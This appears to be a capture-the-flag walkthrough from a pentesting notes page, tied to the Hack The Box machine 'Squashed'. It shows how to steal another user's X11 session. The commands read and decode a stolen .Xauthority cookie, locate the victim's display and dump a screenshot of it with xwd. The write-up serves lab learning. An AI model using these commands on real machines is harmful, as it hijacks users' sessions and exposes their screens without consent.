Screenshot capturing
Pentesting X11X . Window System (X) is a versatile windowing system present on UNIX-based operating systems.
X11
X is a portable, network window system for managing windowed GUI's. When paired with a display manager, it servers as a GUI which can run programs which require a GUI to function properly.
This vulnerbality can be found in: https://app.hackthebox.com/machines/Squashed
Reading the .Xauthority cookie
# Read file
$ cat /mnt/.Xauthority | base64
AQAADHNxdWFzaGVkLmh0YgABMAASTUlULU1BR0lDLUNPT0tJRS0xABCSegJckVyw7fOCjfGE9Aap
# Decode and save in /tmp
echo AQAADHNxdWFzaGVkLmh0YgABMAASTUlULU1BR0lDLUNPT0tJRS0xABCSegJckVyw7fOCjfGE9Aap | base64 -d > /tmp/.Xauthority
Setting the cookie
# Set
export XAUTHORITY=/tmp/.Xauthority
Using this cookie we now have access to a User's session. We can use w to find out which display is used by the user.
alex@squashed:/tmp$ w
16:14:13 up 4:02, 1 user, load average: 0.00, 0.00, 0.00
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
ross tty7 :0 12:12 4:02m 16.33s 0.03s /usr/libexec/gnome-session-binary --systemd --session=gnome
Using the cookie
# Find more
xdpyinfo -display :0
With xwininfo we find active windows.
xwininfo -root -tree -display :0

It shows :0 is the display used. Using the xwd command we dump the image of a window. xwd = X Window dump.
# Dump image
xwd -root -screen -silent -display :0 > /tmp/screen.xwd
-root Main root window.
-screen Send GetImage request to root window
-silent No output messages or sounds
-display Display used
The screenshot
# Convert the screenshot to png
convert screen.xwd screen.png

Last updated
Was this helpful?